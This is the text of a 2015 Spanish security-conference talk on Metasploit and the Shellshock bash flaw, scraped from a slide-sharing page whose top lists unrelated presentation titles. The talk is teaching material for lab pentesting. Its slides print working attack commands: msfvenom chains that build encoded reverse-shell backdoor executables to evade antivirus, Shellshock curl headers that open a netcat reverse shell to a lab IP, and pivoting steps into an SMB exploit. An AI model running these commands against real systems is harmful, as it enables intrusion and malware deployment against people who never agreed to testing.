Presupuesto por Resultados de Seguridad Ciudadana .pptx
 
PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...
PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...
PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...
 
Pablo Scasso - eCommerce Day Chile 2024
Pablo Scasso -  eCommerce Day Chile 2024Pablo Scasso -  eCommerce Day Chile 2024
Pablo Scasso - eCommerce Day Chile 2024
 
Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024
Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024
Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024
 
José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024
José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024
José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024
 
Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...
Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...
Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...
 
Suiwen He - eCommerce Day Chile 2024
Suiwen He  -  eCommerce  Day  Chile 2024Suiwen He  -  eCommerce  Day  Chile 2024
Suiwen He - eCommerce Day Chile 2024
 
Felipe González - eCommerce Day Chile 2024
Felipe González - eCommerce Day Chile 2024Felipe González - eCommerce Day Chile 2024
Felipe González - eCommerce Day Chile 2024
 
Sebastián Iturriaga - eCommerce Day Chile 2024
Sebastián Iturriaga - eCommerce Day Chile 2024Sebastián Iturriaga - eCommerce Day Chile 2024
Sebastián Iturriaga - eCommerce Day Chile 2024
 
Enrique Amarista Graterol - eCommerce Day Chile 2024
Enrique Amarista Graterol - eCommerce Day Chile 2024Enrique Amarista Graterol - eCommerce Day Chile 2024
Enrique Amarista Graterol - eCommerce Day Chile 2024
 
Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024
Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024
Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024
 
Expo Construir 2024 agenda-workshops (2).pdf
Expo Construir 2024 agenda-workshops (2).pdfExpo Construir 2024 agenda-workshops (2).pdf
Expo Construir 2024 agenda-workshops (2).pdf
 
Modelos comunicacionales. Antonella Castrataro.pdf
Modelos comunicacionales. Antonella Castrataro.pdfModelos comunicacionales. Antonella Castrataro.pdf
Modelos comunicacionales. Antonella Castrataro.pdf
 
Act#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdf
Act#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdfAct#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdf
Act#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdf
 
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024
 

Metasploit Class: Shellshock Attack

  • 1. II JORNADA DE SEGURIDAD EN LAS COMUNICACIONES Y LA INFORMACIÓN 1 09/Junio 2015 Julián José González Caracuel Consultor Senior de Seguridad de la Información CISA /GCIH /GPEN /ITIL Certified Organiza:
  • 2. ¿Quién soy? 2 Julian J. González Caracuel Ingeniero de Telecomunicaciones – Esp. Telemática Consultor Senior Seguridad de la Información CISA /GCIH /GPEN /ITIL Certified En sus mas de 10 años de experiencia, ha sido miembro del NVAT (Equipo Nacional de Análisis de Vulnerabilidades) en el Estado Mayor de la Defensa (EMAD), asesor del equipo directivo de Centro de Excelencia CIED de la OTAN en Hoyo de Manzanares, e investigador en el ámbito de los procedimientos y metodologías en entorno a la protección de las Infraestructuras Críticas. Profesor del Modulo de Hacking & Pentesting – Máster de Seguridad TIC – Universidad de Sevilla. Actualmente ejerciendo de Freelance bajo la marca ST2Labs.
  • 3. La clase de hoy 3 INTRODUCCIÓN LESSON LEARNEDDEMOSTRACIÓN
  • 5. ¿Qué es Hacking? 5 • Es la actividad donde se pone en práctica tu habilidad para evadir los sistema de protección y acceder a un Sistema. • En éste área se realizan los test de penetración, comprobación del nivel de seguridad de la Organización desde el punto de vista del atacante, buscando vulnerabilidades y la forma de explotarlas. Hacking, es la parte más creativa del artista By Julian J. González
  • 6. ¿Qué es Hacker Ético? 6 Por supuesto, para convertirse en un Hacker Ético o profesional de la Seguridad de la Información, se deben de obtener los conocimientos suficientes como para ser capaz de comprender la técnicas, manejar las herramientas e interpretar los resultados de éstas. Real Academia Española (RAE) decidió incluir la palabra “hacker” en el diccionario con una al menos curiosa definición: “pirata informático
  • 7. ¿Qué es Hacker Ético?2 7 • Tipos de Hackers: Black: utilizan sus conocimientos para llevar a cabo “actividades ilegales” Grey: son “ambiguos”, utilizan sus conocimientos tanto para llevar a cabo “actividades ilegales” como legales. White: utilizan sus conocimientos para detectar las debilidades y aplicar la contramedidas necesarias. Son los “Profesionales de la Seguridad”
  • 9. Vulnerabilidad vs Exploit 9 Exploit es una pieza de software, fragmento de datos o secuencia de comandos y/o acciones, diseñada para aprovechar la vulnerabilidad y conseguir ejecución de código arbitrario. Vulnerabilidad es el “comportamiento” no esperado en un elemento software, que suelen ser errores de programación y/o diseño de la aplicación o software.
  • 10. Exploit 10 !! Lo encontré ahora soy el AMO ¡¡¡
  • 11. METASPLOIT FRAMEWORK 11 • La herramienta más utilizada por los #Pentester y #Ethical Hacking!! • Es una herramienta para el desarrollo y evaluación de vulnerabilidades. ¡¡ Miles de Exploits listos para atacar !! Web: http://www.metasploit.com/ Download: http://www.metasploit.com/download/ Versión: Community (Free)| Express |Professional Framework (source code) Multiplataforma: Linux / Windows / Mac http://www.tenable.com/products/nessus/nessus-download- agreement Incluida en BackTrack Linux | www.kali.org Free Pentesting Linux Distribution
  • 12. MSF | Arsenal 12 Exploits Payload Aux 1 Interfaz de usuario Modulos Auxiliares: Port Scanning Import vulnerbaility scanning Servers (socks, telnet, ftp…) Launcher Exploit Payload
  • 13. MSF | Ejemplo 13 Ejemplo: Utilización de msfpayload para generar un ejecutable que habilitará en el equipo donde se ejecute una shell (línea de comandos) remota (conexión con la dirección IP introducida en el campo LHOST) Cambiar LHOST por RHOST
  • 14. MSF | Meterpreter 14 • Metasploit Interpreter: es un payload (stages) especialmente diseñado por metasploit para ejecutarse dentro de la memoria de un proceso residente. • Se le conoce como Meterpreter, siendo el payload más potente y flexible del que dispone metasploit. • Permite la carga de módulos y scripts adicionales, por lo que aumenta considerablemente la capacidad de este payload. • Actualmente dispone de una versión de meterpreter tanto para Windows como para Linux. >> Hacking Mobile >Ahora Meterpreter también en Android!!!!
  • 15. MSF | How Works 15 MSF SHELLCODE <-IP:443-> shell remota IP:443 MSF Elemento Vulnerable PAYLOAD: meterpreter/reverse_tcp meterpreter Indirecto (URL, PDF, EXE) - Directo EXPLOIT (PAYLOAD)
  • 16. MSF | How Works2 16 MSF EXPLOIT (PAYLOAD) Carga en memoria el código arbitrario, el STAGER (bind_tcp / reverse_tcp) Elemento Vulnerable send(STAGES) Bind_tcpPAYLOAD = shell / meterpreter send(STAGES) PAYLOAD = shell / meterpreter reverse_tcp IP:Port IP:Port RHOST RPORT LHOST LPORT listener listener DIRECT / BIND REVERSE / BIND
  • 19. MSFVENOM | Ejemplo 19 root@ST2Labs > msfpayload windows/patchupmeterpreter/reverse_tcp LHOST=192.168.2.105 R | msfencode -e php/base64 -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -b 'xff" -t raw | msfencode -e x86/alpha_mixed -c 1 -t exe -o backdoor4.exe root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b 'x00x20x0ax0d' -i 20 -f exe LHOST=192.168.2.105 > p6.exe Técnicas evasión Antivirus | Encoding https://github.com/Veil-Framework/Veil https://github.com/Veil-Framework/
  • 21. Bash < Vulnerable! 21 MILLONES DE DISPOSITIVOS BASADOS EN *NIX EXPUESTOS
  • 22. CVE – SHELLSHOCK - TIMELINE 22 CVE (Common Vulnerabilities and Exposures) 15DIAS
  • 24. How its Works! 24 env X= ‘ () { :;}; echo Vulnerable ’ bash –c “echo comando legitimo” SMTP HTTP DHCP SIP Etc… Servicios vulnerables:
  • 26. Pivoting ! 26 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX OBJETIVO
  • 28. 28 ! RESUMEN PASO A PASO! SHELLSHOCK ATTACK
  • 29. 29 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX 1. SCAN SERVICIOS 2. SCAN SHELLSHOCK 3. COMPROBAR REGLAS FIREWALL nc –lv –p 22 < Lado Server > Check Reglas del Firewall curl -k -H 'User-Agent: () { :;}; /bin/bash -c “echo Bingo!>/dev/tcp/10.0.0.50/22"' http://172.16.0.5/cgi-bin/st2.cgi Shell Inversa curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 10.0.0.50 22"' http://172.16.0.5/cgi-bin/st2.cgi ATTACK
  • 30. 30 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX EXPLOIT multi/handler < PAYLAOD= python/meterpreter/reverse_tcp msf> msfvenom –p python/meterpreter/reverse_tcp LHOST=10.0.0.50 LPORT=22
  • 31. Pivoting ! 31 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX msf> route add 192.168.0.0 255.255.255.0 <sesión-id> msf> use exploit Windows/smb/ms08_netapi / paylaod= windows/meterpreter/bind_tcp
  • 32. Materia para profundizar 32 66,00 ECTS Teléfono 954487384 Web http://trajano.us.es/seguridadtic Email expertoseguridadtic@trajano.us.es MASTER PROPIO – SEGURIDAD EN LA INFORMACIÓN Y LAS COMUNICACIONES (III EDICIÓN) – 2015/2016
  • 33. @st2labs @rhodius 33 www.seguridadparatodos.es Julian J Gonzalez ¿Dónde podéis encontrarme? www.st2labs.com about.me/rhodius https://github.com/ST2Labshttps://twitter.com/seguridadxato2